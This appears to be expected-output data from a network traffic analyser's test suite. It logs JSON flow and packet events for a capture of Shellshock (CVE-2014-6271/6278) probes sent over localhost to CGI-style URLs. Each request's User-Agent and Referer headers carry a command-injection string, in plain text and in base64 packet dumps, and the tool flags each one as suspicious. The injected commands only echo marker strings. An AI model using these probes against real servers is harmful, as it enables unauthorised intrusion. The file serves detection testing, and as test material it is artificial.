00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
